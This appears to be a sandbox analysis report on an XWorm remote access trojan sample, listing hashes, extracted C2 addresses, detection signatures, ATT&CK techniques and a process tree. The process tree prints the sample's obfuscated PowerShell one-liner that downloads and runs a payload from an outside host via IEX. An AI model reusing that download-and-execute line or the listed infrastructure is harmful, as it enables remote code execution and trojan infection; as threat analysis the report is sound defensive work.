xworm | 89e11b195c89fc104208da51765503cc941c169ef118c8180d268dd1ecf8d096

General

Target

cmd.bat
Size

179B
MD5

de7481e65ab0afc6d3928aeed6b20b7d
SHA1

9590ec1a379ae574c161aadc5ece66c185adb072
SHA256

89e11b195c89fc104208da51765503cc941c169ef118c8180d268dd1ecf8d096
SHA512

65ca342a1251c7954cc74877155afacc9d111b1039f3a773e07f5dcf6b98b76eb1147fd6091152f5ffd827b1bb4971d9d80c295bb744c2199c475d71f536cf67

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.54/a.mp4

Extracted

Family

xworm

Version

5.0

C2

185.7.214.108:4411

185.7.214.54:4411

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral2/files/0x000600000001e44f-25.dat	family_xworm
behavioral2/memory/4536-26-0x00000232E0890000-0x00000232E08A0000-memory.dmp	family_xworm
behavioral2/memory/3452-28-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	4536	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4536	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4536 set thread context of 3452	4536	powershell.exe	97

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4536	powershell.exe
4536	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4536	powershell.exe
Token: SeDebugPrivilege	3452	MSBuild.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 3928 wrote to memory of 4536	3928	cmd.exe	86
PID 3928 wrote to memory of 4536	3928	cmd.exe	86
PID 4536 wrote to memory of 4488	4536	powershell.exe	95
PID 4536 wrote to memory of 4488	4536	powershell.exe	95
PID 4488 wrote to memory of 2356	4488	csc.exe	96
PID 4488 wrote to memory of 2356	4488	csc.exe	96
PID 4536 wrote to memory of 3452	4536	powershell.exe	97
PID 4536 wrote to memory of 3452	4536	powershell.exe	97
PID 4536 wrote to memory of 3452	4536	powershell.exe	97
PID 4536 wrote to memory of 3452	4536	powershell.exe	97
PID 4536 wrote to memory of 3452	4536	powershell.exe	97
PID 4536 wrote to memory of 3452	4536	powershell.exe	97
PID 4536 wrote to memory of 3452	4536	powershell.exe	97
PID 4536 wrote to memory of 3452	4536	powershell.exe	97

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')|IEX"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4536
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gpxrju1p\gpxrju1p.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4488
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1C9.tmp" "c:\Users\Admin\AppData\Local\Temp\gpxrju1p\CSC17A817728FCA414A814D861687549943.TMP"
      4⤵
      PID:2356
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC1C9.tmp

Filesize
1KB

MD5
3990dbf8b11d1e225f18e1e63d651e40

SHA1
892b665204ef4385e9e7a8387f827ff9dc09ee72

SHA256
ba0a0a9098205b4bf99cbf0bd0762f6d738d23619bb07a1c2ff3137151c4aa4c

SHA512
b1d7c5fbf17821011906590342b1059841e5a382055a95056c701bd42c0c1c3747a68c4cbb992996d9d5ed70e66ca8075e3326c5f16134f2e510065a2497db8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sy24xeko.y2o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gpxrju1p\gpxrju1p.dll

Filesize
42KB

MD5
64461fe7623121d0a369f9fa1aad3057

SHA1
740b044b46f1f1d5bf24f70af68857f704132df9

SHA256
42f6074bd783bd317935f69de2507b8fbee57b2ba919b89a1d15c63af2e7b3ec

SHA512
0e3b69bebba18e00b5bd23e77b80345af21ac94bea32d0681ffca2397bc385b4aeb06f9d2d656e491cdccd85bc8881f54e94b00327f82d586078b73260a94d60

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gpxrju1p\CSC17A817728FCA414A814D861687549943.TMP

Filesize
652B

MD5
d8703958a9efa9cc8a6ce4d29cb484cf

SHA1
610ac8209a2c84af0ad4fb57d1cc6eb862512623

SHA256
2d5ce246c942fc878ff0c6c6f8b9950709b50b6a3eae615a636579b1748c0f97

SHA512
4340d64685bfdc2db36414e29a1b81c113a697e650324892167f357b3956c112ce8773e0031162cc304c3466fddd93a671e601fb1664b6f6877663633b1fe4f6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gpxrju1p\gpxrju1p.0.cs

Filesize
104KB

MD5
4c235e59a96c8c09a6f7e97b95772164

SHA1
7350cfb88fbf6a2e7a9b12ad85f12e174b22b76a

SHA256
3a8459f7033c4dec0a2a8ee37090fa2fe38a2013667c969ac870965deb0b8c8d

SHA512
0857cc0c6c0aa7204772873a02fbeb11a05d0c890241eedaee6bf4fdd3a4ceaf18e6d612c7e3d47ba1c077104cf91809b133dc2420864d16cd15315c2d47cdf9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gpxrju1p\gpxrju1p.cmdline

Filesize
204B

MD5
4f70399a4e9a4f1b600b5fbd49f5d788

SHA1
1a8e99b97338b98dc338d03b5b0d5a59b7a4ea98

SHA256
83694c7c87b3b8dbc468b11af28b21ea062f5659a5668533d4ffd96f3bc647fa

SHA512
b1ffe64247e65a6b36aa0abd5290067ad4145065936eefbb6d98817122c34d67350856fecd9c46ca74f7610cc39534a1d38224ffb48ae57458651e089456c4fc

Download Submit
memory/3452-33-0x0000000004FA0000-0x000000000503C000-memory.dmp

Filesize
624KB

Download
memory/3452-32-0x0000000074A3E000-0x0000000074A3F000-memory.dmp

Filesize
4KB

Download
memory/3452-37-0x0000000006690000-0x0000000006C34000-memory.dmp

Filesize
5.6MB

Download
memory/3452-36-0x0000000006040000-0x00000000060D2000-memory.dmp

Filesize
584KB

Download
memory/3452-35-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/3452-34-0x0000000074A3E000-0x0000000074A3F000-memory.dmp

Filesize
4KB

Download
memory/3452-28-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4536-10-0x00000232E08A0000-0x00000232E08C2000-memory.dmp

Filesize
136KB

Download
memory/4536-31-0x00007FFE95E10000-0x00007FFE968D1000-memory.dmp

Filesize
10.8MB

Download
memory/4536-0-0x00007FFE95E13000-0x00007FFE95E15000-memory.dmp

Filesize
8KB

Download
memory/4536-26-0x00000232E0890000-0x00000232E08A0000-memory.dmp

Filesize
64KB

Download
memory/4536-13-0x00000232E0C90000-0x00000232E0CE6000-memory.dmp

Filesize
344KB

Download
memory/4536-11-0x00007FFE95E10000-0x00007FFE968D1000-memory.dmp

Filesize
10.8MB

Download
memory/4536-12-0x00007FFE95E10000-0x00007FFE968D1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads